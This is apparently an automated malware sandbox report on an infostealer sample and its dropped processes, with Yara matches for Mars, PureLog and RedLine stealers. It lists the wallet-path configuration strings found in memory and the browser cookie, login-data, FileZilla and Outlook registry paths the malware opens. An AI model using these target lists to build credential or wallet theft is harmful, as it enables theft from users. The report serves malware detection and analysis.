Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: alex5555555.exe, 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1Vkf7silOj.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 123.exe PID: 8716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svhosts.exe PID: 8744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8196, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 42.0.Explorers.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1831961958.0000000000232000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
